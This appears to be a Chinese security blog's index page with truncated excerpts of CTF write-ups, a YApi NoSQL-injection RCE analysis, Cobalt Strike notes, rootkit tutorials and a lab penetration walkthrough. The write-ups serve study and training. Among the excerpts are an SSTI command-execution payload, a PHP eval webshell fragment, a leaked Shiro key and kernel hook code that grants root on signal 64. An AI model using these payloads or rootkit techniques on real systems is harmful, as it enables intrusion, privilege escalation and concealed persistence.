基于Yapi下的MongoDB NoSQL注入造成的RCE
某次打点时偶遇Yapi管理平台资产,发现其存在版本下 (< 1.12.0) 的nday漏洞,整个攻击过程感觉挺巧妙的,以此记录下对其白盒测试的分析和思考
环境搭建YApi v1.10.2
1docker compose up -d
漏洞复现MongoDB的基础使用MongoDB是一种非关系型数据库 (NoSQL) 是一类不采用传统表格结构来存储数据的数据库,它将数据以类似 JSON 的格式存储,每条记录就是一个文档。这种结构非常适合存储复杂、嵌套的数据
虽然这有点脱离这篇文章的重心,但我觉得还是可以简单了解一下这种数据库的特性
简单来说就是在一些游戏活动场景下,并不是每个用户都会参与活动,如果像关系型数据库那样,给每个用户都添加该活动名的字段,那有很多用户的该字段下一定是空的,这样就会造成大量空间浪费,况且游戏迭代非常频繁,每次都会修改表结构
ID
Name
装备
春节活动
七夕活动
夏日活动
1
Hong
剑
是
2
Ming
枪
是
是
3
Bai
刀
是
但非关系型数据库就不会存在这样的情况,因为每一个文档就是一行数据,那多个文档对应 ...
记 Cobalt Strike 基础使用
启动服务器
1./teamserver <服务端ip> <CS服务端密码>
创建监听器上线客户端后,首先创建一个Beacon
可以看到这里有好几个类型,当然最常见的就是HTTP Beacon
Beacon是一种核心的远程控制组件,是植入目标主机后用于维持访问、执行命令、上传下载文件、横向移动等操作的“后门”,我们可以以此为载荷执行命令、上传下载文件、键盘记录、屏幕截图、横向移动、提权等
正如上图,其支持多种协议,用于不同的场景下
🔄Beacon的通信模式
异步通信:每隔一段时间(由 Sleep 设置)主动向 C2 请求任务并回传结果
交互式通信:实时响应命令(Sleep 设置为 0),适合快速操作但隐蔽性较差
External C2外部控制通道:自定义通信协议,将 Beacon 与 Team Server 连接起来(使用 Python、C、Go 等语言编写自己的第三方控制器和客户端)
Foreign HTTP/HTTPS外部 Beacon 会话:已经通过其他工具植入了 Payload,但想用 Cobalt Strike 的 GUI 来控制它,使用端口 ...
ClassLoder类加载器
以前学习Java反序列化的过程中多多少少接触了一些Java基础知识点,但自己并未系统性的学习过,借此机会来将Java基础巩固一下,也是对Java这门语言有更深刻的认识,二是更快上手Java安全的其它知识
ClassLoder初步感知众所周知,Java是依赖JVM的跨平台语言,其屏蔽了底层操作系统的差异,我们有时看到的.class文件就是被预先编译好的字节码文件,只能被JVM解释编译
当Java程序运行时,JVM并不会一次性加载所有类,而是按需加载,因此java.lang.ClassLoader就充当了一个中间人,加载类的任务由它完成;接着再调用JVM的native方法,从而创建一个 java.lang.Class 实例
ClassLoader类有如下核心方法:
loadClass(加载指定的Java类)
findClass(查找指定的Java类)
findLoadedClass(查找JVM已经加载过的类)
defineClass(定义一个Java类)
resolveClass(链接指定的Java类)
ClassLoder类加载流程主要是两种加载方式,当然加载后都要配合反射去调用输出 ...
NepCTF2025-Web
JavaSeri盲猜Shiro反序列化
1kPH+bIxk5D2deZiIxcaaaA==
有了key直接连
注入内存马后在环境变量中找到flag
RevengeGooGooVVVY这是一个Groovy表达式注入,在了解了基本的语法后发现
禁用闭包功能
1secureASTCustomizer.setClosuresAllowed(false);
禁用execute方法
123if (methodName.equals("execute")) { throw new SecurityException("Calling "+methodName+" on "+ "is not allowed");}
只允许调用string类的合法方法
1234567if (typeName.equals("java.lang.String")) { if (STRING_METHODS.contains(methodName)) { ...
Rootkit学习(二)
Root后门Linux信号机制Linux信号是进程间通信的一种方式,用于通知进程发生了某种事件或异常,其是异步的,可以由内核、其他进程或进程自身触发
比如kill -9 $PID强制杀死进程,其中9定义为SIGKILL,可以在signal.h查看
在64位中64号默认无特殊用途,需手动注册和处理,也许我们可以借助这个信号来埋藏一个后门
因此接下来的这个钩子的思路显而易见,即检查是否信号SIG = 64,否则就还是本身的系统调用sys_kill
1int kill(pid_t pid, int sig);
1234567891011121314151617asmlinkage int hook_kill(const struct pt_regs *regs){ void set_root(void); // pid_t pid = regs->di; int sig = regs->si; if ( sig == 64 ) { printk(KERN_INFO "rootkit: giving roo ...
Rootkit学习(一)
简介&内核理解
“A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software.”
Rootkit 是一组计算机软件,通常是恶意软件,旨在访问计算机或其软件的某个区域(例如,未经授权的用户),并且通常会掩盖其自身或其他软件的存在。
在内核Rootkit中,编写的代码将通过编写的内核模块以内核级权限运行,其核心技术是函数挂钩(function hooking)
这会在内存中找到需要劫持的内核函数(例如列出目录、进程通信等关键操作);然后实现自定义的恶意版本,同时保留原始函数的副本,以维持系统正常功能;接着通过 ...
Linux中隐藏进程的方法
用户态隐藏进程名伪装 (prctl结合argv[0])在网上看到一个 prctl 函数可以修改当前的进程名,使用方法则在当前逻辑添加代码即可
1234567891011121314151617#include <cstdio>#include <cstdlib>#include <cstring>#include <unistd.h>#include <sys/prctl.h>int main(int argc, char* argv[], char *envp[]){ const char *new_title = "prctl_new_name"; prctl(PR_SET_NAME, new_title, NULL, NULL, NULL); while (true) { sleep(2); } return 0;}
但是好像不起作用
首先我们需要知道的是,ps和top的底层逻辑是读取并遍历/proc目录下的 ...
LitCTF 2025 Web
Web星愿信箱
看起来有点像模板注入,看起来数字被过滤掉了,一些跟配置文件相关的参数也被过滤掉了
首先是会匹配字母,否则返回:愿望需要包含文字内容噢)~
然后匹配到连续的两个花括号,返回:愿望被神秘力量屏蔽了~
这里两个{% if ... %}1{% endif %}和{%print(......)%}都可以用,此时数字没有过滤
后续发现只过滤了双花括号还有cat
1{%print(lipsum.__globals__.__builtins__['__import__']('os').popen('more /flag').read())%}
nest_js根据长度爆破出弱密码
然后就出了…
easy_file
依旧是弱密码爆破
1password
怀疑是否有nginx解析漏洞?尝试一下
制作图片🐎并上传,这里不能上传png图片,换成jpg试试
发现是过滤了php,可以改成
1<?= @eval($_POST['cmd ...
ThinkPHP 5.1.x 反序列化漏洞
之前护网遇到好几个Thinkphp的框架,借此来学习其中一个漏洞
__destruct()作为入口点我们找到Whindows.php的__destruct()魔术方法作为链子的入口,并跟进removeFiles()函数
这里的$filename变量是一个string类型,当我们传入一个对象到期望接收字符串的函数时,PHP会自动尝试将该对象转换为字符串。这时会触发对象的 __toString() 魔术方法
寻找触发__toString的关联类因此我们再次找到Conversion.php中的__toString方法
但需要注意的是该方法的Conversion是一个trait
trait关键字的作用:
trait是PHP从5.4.0版本开始引入的一种代码复用机制
它允许开发者创建一组方法,这些方法可以被不同的类引入使用
trait的主要目的是解决PHP单继承的限制,实现代码复用
trait只是一组方法的集合,不是完整的类,因此trait不能被实例化
正确的触发方式是
1234567class SomeModel extends \think\Model { ...
Hospital靶机渗透
你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个flag,分布于不同的靶机
flag01
发现22端口和8080端口
22端口的SSH密钥强度较高,暂时不看;8080端口运行着Apache Tomcat的Web服务,标题为医疗管理后台
UDP扫描结果价值不大,漏洞扫描
Spring Boot Actuator端点暴露发现CVE-2010-0738 JBoss漏洞,但估计是版本匹配不上,POC无法利用;还有一个是Spring Boot Actuator端点暴露,检测到/actuator/路径
这篇文章可以看到原生端点的一些作用Springboot之actuator配置不当的漏洞利用
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172{ "_links ...